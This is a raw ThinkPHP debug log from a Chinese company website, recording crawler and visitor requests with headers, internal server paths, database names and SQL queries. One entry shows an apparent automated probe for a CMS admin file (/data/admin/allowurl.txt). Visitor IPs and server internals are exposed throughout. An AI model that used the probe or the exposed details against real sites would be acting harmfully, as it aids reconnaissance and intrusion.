[文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/175_html' => '', 'id' => '175', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 175 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 175 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T14:38:38+08:00 ] 49.7.21.119 GET / [ info ] www.kinsana.cn/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,015.91kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T14:40:43+08:00 ] 113.137.196.78 GET / [ info ] www.kinsana.cn/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,018.16kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'x-requested-with' => 'com.tencent.mm', 'x-forwarded-for-pound' => '113.137.196.78', 'x-forwarded-for' => '113.137.196.78', 'user-agent' => 'Mozilla/5.0 (Linux; Android 10; TAS-AL00 Build/HUAWEITAS-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/77.0.3865.120 MQQBrowser/6.2 TBS/045709 Mobile Safari/537.36 MMWEBID/6228 MicroMessenger/8.0.7.1920(0x28000737) Process/tools WeChat/arm64 Weixin NetType/4G Language/zh_CN ABI/arm64', 'upgrade-insecure-requests' => '1', 'q-qimei' => '92c663e431de5636', 'host' => 'www.kinsana.cn', 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7', 'accept-encoding' => 'gzip', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.015625s ] --------------------------------------------------------------- [ 2021-07-16T14:41:05+08:00 ] 123.183.224.113 GET / [ info ] www.xn--vhqsn14am88k.com/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,016.02kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T14:41:48+08:00 ] 101.89.239.238 GET / [ info ] www.kinsana.cn/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,016.40kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'host' => 'www.kinsana.cn', 'accept-language' => 'zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Linux; Android 6.0.1; OPPO R9s Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile MQQBrowser/6.9 TBS/036906 Safari/537.36 MicroMessenger/6.5.4.1000 NetType/4G Language/zh_CN', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T14:41:54+08:00 ] 39.101.187.184 GET /data/admin/allowurl.txt [ info ] www.kinsana.cn/data/admin/allowurl.txt [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,069.13kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'data', 1 => 'admin', 2 => 'allowurl.txt', ), ) [ info ] [ HEADER ] array ( 'content-type' => 'application/x-www-form-urlencoded', 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/data/admin/allowurl_txt' => '', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T14:42:44+08:00 ] 106.11.157.120 GET /index/news/xwxq/id/11.html [ info ] www.kinsana.cn/index/news/xwxq/id/11.html [运行时间:0.187500s][吞吐率:5.33req/s] [内存消耗:2,207.05kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/11_html' => '', 'id' => '11', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.062500s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 11 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 11 [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T15:31:54+08:00 ] 14.134.19.69 GET / [ info ] www.xn--vhqsn14am88k.com/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,016.95kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'accept-language' => 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6', 'accept-encoding' => 'gzip, deflate', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.67', 'upgrade-insecure-requests' => '1', 'connection' => 'close', 'host' => 'www.xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T15:31:55+08:00 ] 14.134.19.69 GET /ajaxArea.php?id=1000139 [ info ] www.xn--vhqsn14am88k.com/ajaxArea.php?id=1000139 [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,070.49kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'ajaxArea.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-language' => 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.xn--vhqsn14am88k.com/', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.67', 'accept' => '*/*', 'connection' => 'close', 'host' => 'www.xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( '/ajaxArea_php' => '', 'id' => '1000139', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T15:31:55+08:00 ] 14.134.19.69 POST /index/index/proapi.html [ info ] www.xn--vhqsn14am88k.com/index/index/proapi.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:1,904.88kb] [文件加载:49] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'index', 2 => 'proapi', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-language' => 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.xn--vhqsn14am88k.com/', 'origin' => 'http://www.xn--vhqsn14am88k.com', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.67', 'x-requested-with' => 'XMLHttpRequest', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'content-length' => '7', 'connection' => 'close', 'host' => 'www.xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( '/index/index/proapi_html' => '', 'cates' => '5', ) [ info ] [ RUN ] app\index\controller\Index->proapi[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`cate_id`,`sm_img`,`name`,`pro_name`,`sp` FROM `product` WHERE `cate_id` = 5 AND `is_top` = 1 AND `state` = 1 ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 4 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T15:32:02+08:00 ] 14.134.19.69 GET /index/contanct/lxwm.html [ info ] www.xn--vhqsn14am88k.com/index/contanct/lxwm.html [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,327.72kb] [文件加载:45] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'contanct', 2 => 'lxwm', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-language' => 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.xn--vhqsn14am88k.com/', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.67', 'upgrade-insecure-requests' => '1', 'connection' => 'close', 'host' => 'www.xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( '/index/contanct/lxwm_html' => '', ) [ info ] [ RUN ] app\index\controller\Contanct->lxwm[ D:\WWW\kinsasa\application\index\controller\Contanct.php ] [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\contanct\lxwm.htm [ array ( ) ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T15:43:44+08:00 ] 123.183.224.113 GET / [ info ] www.xn--vhqsn14am88k.com/ [运行时间:0.156250s][吞吐率:6.40req/s] [内存消耗:2,016.02kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T15:56:26+08:00 ] 106.38.241.188 GET / [ info ] www.kinsana.cn/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,015.91kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T15:59:37+08:00 ] 220.181.108.122 GET / [ info ] www.kinsana.cn/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,016.08kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'accept' => '*/*', 'accept-encoding' => 'gzip', 'accept-language' => 'zh-cn,zh-tw', 'user-agent' => 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.015625s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T15:59:48+08:00 ] 116.179.37.72 GET /ajaxArea.php?id=1000139 [ info ] www.kinsana.cn/ajaxArea.php?id=1000139 [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,071.52kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'ajaxArea.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip', 'x-requested-with' => 'XMLHttpRequest', 'tmphost' => 'www.kinsana.cn', 'resource-type' => '13', 'referer' => 'http://www.kinsana.cn/', 'proxy-connection' => 'Keep-Alive', 'fetchergroup' => 'UNICOM', 'fetchaddr' => '114.215.150.118, 114.215.150.118', 'accept-language' => 'zh-CN,zh;q=0.9;q=0.9,en;q=0.8;q=0.8,en-GB;q=0.7;q=0.7,en-US;q=0.6;q=0.6,fr;q=0.5;q=0.5', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', 'host' => 'www.kinsana.cn', ) 